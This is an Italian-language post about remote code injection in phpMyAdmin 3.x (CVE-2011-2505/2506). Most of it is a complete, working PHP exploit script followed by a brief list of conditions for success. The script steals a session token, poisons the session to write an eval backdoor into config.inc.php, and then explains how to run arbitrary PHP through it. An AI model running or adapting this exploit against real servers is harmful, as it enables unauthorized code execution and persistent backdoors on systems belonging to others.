phpMyAdmin 3.x Remote Code Injection Exploit
Vari bug nel codice di PhpMyAdmin permettono di eseguire codice PHP arbitrario e di eseguire una directory traversal sul server.
Fortunatamente per poter sfruttare queste vulnerabilità devono sussistere alcune condizioni, che vedremo in seguito.
Partiamo subito con uno dei vari exploit esistenti in rete
<?php /*
# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
# Date: 2011-07-09
# Author: Mango of ha.xxor.se
# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
# CVE : CVE-2011-2505, CVE-2011-2506
# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
*/
echo php_sapi_name()!==’cli’?'<pre>’:”;?>
.
, )\ .
. ,/) , / ) , )\
)\( /)/( (__( /( / ) __ __ ________ __ __
/ \ ( )| |) \ / | |\ /| | | | | | | | (__)
( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____
\| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | |
| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|
==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []
Remote Code Injection [] [][] [] [] [] [] [] []
http://ha.xxor.se [][] [] [] [] [][] [][] [] []
_ _ ___ __ ____ __ ___ ___
| |-| || _ |\ /\ /| _ || )
|_|-|_||_|_|/_._\/_._\|___||_|_\
___ ___ ___ _ _ ___ ___ __ __
( < | [_ / /| || || )(_)| |\ | /
>__)|_[_ \__\|____||_|_\|_| |_| |_|Use responsibly.
<?php echo php_sapi_name()!==’cli’?'</pre>’:”;
if(php_sapi_name()===’cli’){
if(!isset($argv[1])){
output(” Usage\n “.$argv[0].” http://example.com/phpMyAdmin-3.3.9.2″);
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = isset($_REQUEST[‘url’])?$_REQUEST[‘url’]:”;
}
$code = ‘foreach($_GET as $k=>$v)if($k===”eval”)eval($v);’;
$cookie = null;
$token = null;
if(!function_exists(‘curl_init’)){
output(‘[!] Fatal error. Need cURL!’);
killme();
}
$ch = curl_init();
$debug = 0;
if(php_sapi_name()!==’cli’){
?>
<form method=post>
URL: <input name=url value=”<?php echo htmlspecialchars($pmaurl);?>”> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST[‘submit’]))killme(true);
}output(“[i] Running…”);
// Start a session and get a token
curl_setopt_array($ch, array(
CURLOPT_URL => $pmaurl.’/setup/index.php’,
CURLOPT_HEADER => 1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
));
output(“[*] Contacting server to retrive session cookie and token.”);$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
output(“[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.”);
killme();
}
if(!$result){
output(“[!] cURL error:”.curl_error($ch));
killme();
}
if(false !== strpos($result, ‘Cannot load or save configuration’)){
output(“[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.”);
killme();
}// Extract cookie
preg_match(‘/phpMyAdmin=([^;]+)/’, $result, $matches);
$cookie = $matches[1];
output(“[i] Cookie:”.$cookie);
// Extract token
preg_match(‘/(token=|token” value=”)([0-9a-f]{32})/’, $result, $matches);
$token = $matches[2];
output(“[i] Token:”.$token);// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.’/?_SESSION[ConfigFile][Servers][*/’.urlencode($code).’/*][port]=0&session_to_unset=x&token=’.$token);
curl_setopt($ch, CURLOPT_COOKIE, ‘phpMyAdmin=’.$cookie);
output(“[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.”);
if(!$result = curl_exec($ch)){
output(“[!] cURL error:”.curl_error($ch));
killme();
}//echo htmlspecialchars($result,ENT_QUOTES);
// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.’/setup/config.php’);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ‘submit_save=Save&token=’.$token);
output(“[*] Contacting server to make it save the injected code to a file.”);
if(!$result = curl_exec($ch)){
output(“[!] cURL error:”.curl_error($ch));
killme();
}//echo htmlspecialchars($result,ENT_QUOTES);
curl_setopt($ch, CURLOPT_URL, $pmaurl.’/config/config.inc.php?eval=echo%20md5(123);’);
curl_setopt($ch, CURLOPT_POST, 0);
output(“[*] Contacting server to test if the injected code executes.”);
if(!$result = curl_exec($ch)){
output(“[!] cURL error:”.curl_error($ch));
killme();
}
if(preg_match(‘/202cb962ac59075b964b07152d234b70/’, $result)){
output(“[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!”);
output(“[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20’test’;”);
}else{
output(“[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.”);
}curl_close($ch);
function output($msg){
echo php_sapi_name()!==’cli’?htmlspecialchars(“$msg\n”,ENT_QUOTES):”$msg\n”;
flush();
}function killme(){
output(“[*] Exiting…”);
echo php_sapi_name()!==’cli’?'<pre>’:”;
die();
}echo php_sapi_name()!==’cli’?'<pre>’:”;
?>
Ora vediamo le condizioni necessarie per effettuare con successo l’exploit.
- Se la cartella di configurazione è lasciata intatta, phpMyAdmin è vulnerabile.
- Se l’attaccante ha accesso alle credenziali del database e la Suhosin patch non è installata, phpMyAdmin è vulnerabile.
- Se l’attaccante ha accesso alle credenziali del database e sa come effettuare una local file inclusion, phpMyAdmin è vulnerabile.
Come visto devono sussistere alcune condizioni particolari, ma non è totalmente impossibile poter sfruttare questi bugs del codice di phpMyAdmin. Potendo sfruttarne altri precedenti è infatti possibile combinarne gli effetti e ottenere accesso root al database.
- http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
- http://www.exploit-db.com/exploits/17514/